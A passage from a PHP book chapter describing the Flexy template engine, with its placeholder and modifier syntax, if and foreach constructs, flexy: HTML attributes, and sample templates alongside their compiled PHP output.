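echo compile_placeholders('<h1>{title}</h1>' . "\n" . '<p>{body}</p>' . "\n");
```

Because the result is ordinary PHP, it can be written to a file once and then simply included on later requests, which is why compiled templates avoid the per-request parsing cost described for IT.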

11.3.3.3 Flexy Markup Format

So far, you have seen examples of placeholders and the {foreach:} construct in Flexy. Table 11.2 gives a full list of the constructs that Flexy supports.

Table 11.2 Flexy Markup Tags

    Tag                      Description
    {variable}               This is the regular placeholder. By default,
    {variable:h}             placeholders are encoded by htmlspecialchars().
    {variable:u}             The :h modifier disables this to pass the raw
                             value through, while the :u modifier encodes
                             with urlencode() instead.
    {method()}               This tag calls a method in the view object and
    {method():h}             uses the return value. As with variables,
    {method():u}             htmlspecialchars() is used by default, and you
                             can use the :h and :u modifiers.
    {if:variable}            if statements are available, but only with
    {if:method()}            Boolean tests, not arbitrarily complex logic.
    {if:!variable}           ifs are limited to variables, method calls,
    {if:!method()}           and negation.
    {else:}                  else. The {else:} tag must be used with {if:}
                             and {end:}.
    {end:}                   The {end:} tag is used to finish both
                             {foreach:} and {if:}.
    {foreach:arr,val}        Corresponds to PHP’s foreach. The first
    {foreach:arr,ind,val}    variation iterates over arr and assigns each
                             element in turn to val. The second variation
                             assigns the array index to ind as well.

11.3.3.4 Flexy HTML Attribute Handling

One of the interesting things about Flexy is how it handles HTML/XML elements and attributes in the template. To give you an example, here is the last example again with the template changed to use a Flexy HTML/XML attribute for controlling a block:

    <html>
     <head>
      <title>{title}</title>
     </head>
     <body>
      <h1>{title}</h1>
      <ul>
       <li flexy:foreach="list_entries,entry_text">{entry_text}</li>
      </ul>
      (End of list)
     </body>
    </html>

The {foreach:} construct is gone; it is replaced by an attribute to the element that is being repeated: <li>. This looks a bit like XML namespaces, but it is not; the Flexy compiler removes the flexy:foreach attribute during compilation, and generates the same PHP code as the {foreach:} variant. The compiled version of this template looks like this:

    <html>
     <head>
      <title><?php echo htmlspecialchars($t->title);?></title>
     </head>
     <body>
      <h1><?php echo htmlspecialchars($t->title);?></h1>
      <ul>
       <?php if (is_array($t->list_entries) || is_object($t->list_entries)) foreach($t->list_entries as $entry_text) {?>
       <li><?php echo htmlspecialchars($entry_text);?></li>
       <?php }?>
      </ul>
      (End of list)
     </body>
    </html>

The XML/HTML attributes supported by Flexy are outlined in Table 11.3.

Table 11.3 Flexy HTML/XML Attributes

    Attribute                    Description
    flexy:if="variable"          This is a simplified {if:}. The condition
    flexy:if="method()"          applies to the XML/HTML element and its
    flexy:if="!variable"         subelements, and there is no {else:}. If the
    flexy:if="!method()"         test is false, the current element and all
                                 its child elements are ignored.
    flexy:start="here"           The flexy:start attribute can be used to
                                 ignore everything outside the current
                                 element. This is useful if you have
                                 sub-templates but still want to be able to
                                 view or edit them as complete HTML files.
    flexy:startchildren="here"   Similar to flexy:start, but ignores
                                 everything up to and including the current
                                 element.
    flexy:ignore="yes"           Ignores the current element and all child
                                 elements. It’s useful for putting mock-up
                                 data in templates that are edited with some
                                 visual web-design tool.
    flexy:ignoreonly="yes"       Ignores all child elements, but not the
                                 current element.

11.3.3.5 Flexy HTML Element Handling

Finally, Flexy can parse HTML form elements and fill them in with correct data. This makes it easy to create a form template in some web-design tool without having to dissect the template before using it on your site.

Flexy handles the following four HTML elements (see Table 11.4).

Table 11.4 HTML Elements